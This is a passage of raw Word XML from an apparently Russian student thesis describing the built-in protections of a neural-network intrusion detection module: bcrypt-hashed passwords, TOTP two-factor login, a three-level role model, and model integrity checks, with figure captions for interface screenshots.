        <w:t xml:space="preserve">Помимо основной функции обнаружения сетевых атак, разработанный нейросетевой модуль реализует собственные механизмы защиты, обеспечивающие безопасность самого инструмента мониторинга. В данном разделе приводится описание и практическая проверка каждого из реализованных механизмов. </w:t>
      </w:r>
      <w:r w:rsidR="00106F01" w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Страница аутентификации с полем для ввода кода представлена на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00106F01" w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A380F71" w14:textId="77777777" w:rsidR="00402025" w:rsidRDefault="00402025" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7358C066" w14:textId="28143B59" w:rsidR="00402025" w:rsidRDefault="00CD5AEA" w:rsidP="003C0349">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD5AEA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="26D31CC3" wp14:editId="6A7E2BF1">
            <wp:extent cx="3190875" cy="3964420"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1713637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37878" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId30"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3199504" cy="3975141"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="134B8579" w14:textId="3EB11E86" w:rsidR="002A245A" w:rsidRPr="00601CA8" w:rsidRDefault="002A245A" w:rsidP="003C0349">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4155"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изображение интерфейса с</w:t>
      </w:r>
      <w:r w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>траница аутентификации</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4058B360" w14:textId="77777777" w:rsidR="008E40CC" w:rsidRDefault="008E40CC" w:rsidP="00351289">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="518CAC67" w14:textId="512680F0" w:rsidR="00402025" w:rsidRDefault="00351289" w:rsidP="008E40CC">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Доступ</w:t>
      </w:r>
      <w:r w:rsidR="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidR="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">интерфейсу модуля осуществляется через страницу аутентификации с вводом логина и пароля. Пароли хранятся в базе данных в виде </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>хеш</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>значений,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>вычисленных</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">помощью </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E40CC" w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bcrypt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">криптографическая функция хеширования паролей), что исключает возможность их восстановления при компрометации базы данных. Для повышения уровня защиты учётных записей реализована двухфакторная аутентификация на основе протокола </w:t>
      </w:r>
      <w:r w:rsidR="008E40CC" w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>TOTP</w:t>
      </w:r>
      <w:r w:rsidR="008E40CC" w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Time-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E40CC" w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>based</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E40CC" w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> One-Time Password — одноразовый пароль на основе времени)</w:t>
      </w:r>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, совместимая с приложением Google </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Authenticator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00351289">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. При включённой двухфакторной аутентификации после ввода логина и пароля система запрашивает одноразовый шестизначный код, генерируемый приложением на мобильном устройстве администратора. Код действителен в течение 30 секунд, что делает перехват сессии практически невозможным.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A3B8F8" w14:textId="238D0975" w:rsidR="00402025" w:rsidRDefault="008E40CC" w:rsidP="00EA02A1">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В системе реализована ролевая модель управления доступом с тремя уровнями привилегий.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Её реализация приведена на рисунке 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E0B51E" w14:textId="77777777" w:rsidR="00402025" w:rsidRDefault="00402025" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C96441F" w14:textId="1FB776D3" w:rsidR="002A245A" w:rsidRDefault="00EA02A1" w:rsidP="005D6C1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA02A1">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42541362" wp14:editId="60B78C6A">
            <wp:extent cx="5603875" cy="2493645"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="1062076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76106" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId31"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5603875" cy="2493645"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4CC3E2" w14:textId="376FB3E2" w:rsidR="00402025" w:rsidRDefault="002A245A" w:rsidP="005D6C1B">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Рисунок 1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="00C37E13">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003617AD" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Изображение интерфейса ролевой</w:t>
      </w:r>
      <w:r w:rsidR="00EA02A1" w:rsidRPr="003617AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> модель управления доступом</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10410F2B" w14:textId="77777777" w:rsidR="00402025" w:rsidRDefault="00402025" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78F20D88" w14:textId="4906FFD0" w:rsidR="00BA257D" w:rsidRDefault="008E40CC" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Администратор обладает полным доступом ко всем функциям системы, включая управление пользователями, запуск анализа, просмотр журнала аудита и блокировку IP-адресов. Оператор может запускать анализ и слежение, управлять белым списком адресов и просматривать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алерты</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, однако не имеет доступа к управлению пользователями. </w:t>
      </w:r>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В рамках данной работы под </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>алертом</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> понимается автоматически сформированное системой уведомление о </w:t>
      </w:r>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">выявленном аномальном сетевом потоке, классифицированном нейросетевой моделью как потенциально вредоносный. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Алерт</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> содержит IP-адрес источника, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>временну́ю</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00BA257D" w:rsidRPr="00BA257D">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> метку события и вероятность принадлежности потока к классу атаки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F22B087" w14:textId="6A73D653" w:rsidR="00402025" w:rsidRDefault="008E40CC" w:rsidP="00106F01">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Аналитик обладает правами только на просмотр результатов анализа без возможности запуска каких-либо операций. Все попытки доступа к функциям, превышающим полномочия пользователя, фиксируются и возвращают код ошибки 403.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F61F6" w14:textId="753974B4" w:rsidR="00402025" w:rsidRDefault="008E40CC" w:rsidP="008E40C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 же в плагине реализован к</w:t>
      </w:r>
      <w:r w:rsidRPr="008E40CC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>онтроль целостности нейросетевой модели</w:t>
      </w:r>
      <w:r w:rsidR="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, для предотвращения отравления или модификации</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00106F01" w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Интерфейс проверки целостности представлен на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00106F01" w:rsidRPr="00106F01">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B75278" w14:textId="77777777" w:rsidR="00402025" w:rsidRDefault="00402025" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
